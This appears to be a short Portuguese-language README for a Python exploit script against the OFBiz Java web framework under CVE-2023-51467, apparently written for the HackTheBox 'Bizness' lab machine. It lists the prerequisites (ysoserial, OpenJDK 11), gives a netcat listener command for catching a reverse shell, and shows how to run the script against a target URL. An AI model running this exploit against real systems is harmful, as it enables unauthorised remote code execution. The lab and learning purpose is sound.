
Script de exploração automática para o framework web Java OF Biz sob CVE-2023-51467.

Script de exploração automática para o framework web Java OF Biz sob a CVE-2023-51467. Inspirado na máquina Bizness do HackTheBox.
Este script requer a ferramenta ysoserial e o OpenJDK versão 11. Consulte o menu de uso para instalação.
Configure um listener para capturar o shell com o método de sua preferência. Aqui está um exemplo com netcat:
nc -nlvp 1337
Execute o script:
python3 badbizness.py [caminho para ysoserial-all.jar] [URL BASE DO ALVO] [IP DO LISTENER] [PORTA DO LISTENER]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
Esta ferramenta foi criada como uma forma de aprender mais sobre Python. Agradeço a este script por me ajudar profundamente.